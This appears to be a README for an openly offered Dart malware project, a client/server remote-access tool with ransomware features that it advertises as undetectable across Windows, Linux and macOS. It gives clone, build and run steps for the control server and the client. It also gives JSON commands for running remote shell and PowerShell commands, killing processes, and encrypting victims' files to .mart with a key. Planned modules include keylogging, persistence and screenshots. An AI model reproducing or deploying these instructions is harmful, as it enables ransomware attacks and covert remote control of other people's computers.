Malware created on dART
_____/* | ____
`, `)--`
- Written in Dart lang
- Object Oriented
- Client/Server TCP based
- Undetectable (FUD)
- Multiplataform (Windows, Linux, Mac-Os)
- Ransomware
- Support Multiple Clients
- Beta Mobile Client
$ git clone [email protected]:joao-b4/mart-malware-dart.git
$ cd mart-malware-dart/
# get packages
$ cd client/desktop && dart pub get && cd ../../
$ cd server && dart pub get && cd ../
$ dart server/bin/main.dart
# list the clients online
> /list
# set a client to send command
> /set 0
# run the command on connect client
> {"id": "1"}
# exit from command interface and return to menu (/list,/set)
> /menu
$ dart client/desktop/bin/main.dart
$ cd client/desktop
$ dart compile exe bin/main.dart
- Get Information from System
{"id": "1"}
- Run Command on System
{"id": "2", "parameter": "ipconfig"}
- Run Command on System through powershell *(Windows only)
{"id": "3", "parameter": "ls"}
- Kill Process in the System
{"id": "4", "parameter": "4517"}
- Encrypt files from selected path to .mart
{"id": "5", "path":"C:\\Users\\const\\Documents\\code\\dart\\mart-malware-dart\\client\\lib\\modules\\test", "key":"oSEBTdO89X5cCTAsW4o4qquLQvgjJEhO" }
- Decrypt files(.MART) from selected path
{"id": "6", "path":"C:\\Users\\const\\Documents\\code\\dart\\mart-malware-dart\\client\\lib\\modules\\test", "key":"oSEBTdO89X5cCTAsW4o4qquLQvgjJEhO" }
- Multiple Clients
- Mobile Client
- Persistence Module
- Upload Module
- Keylogger Module
- Screenshot Module
- Encryption to Client/Server communication
- Flutter GUI For Server Control
- MessageBox Module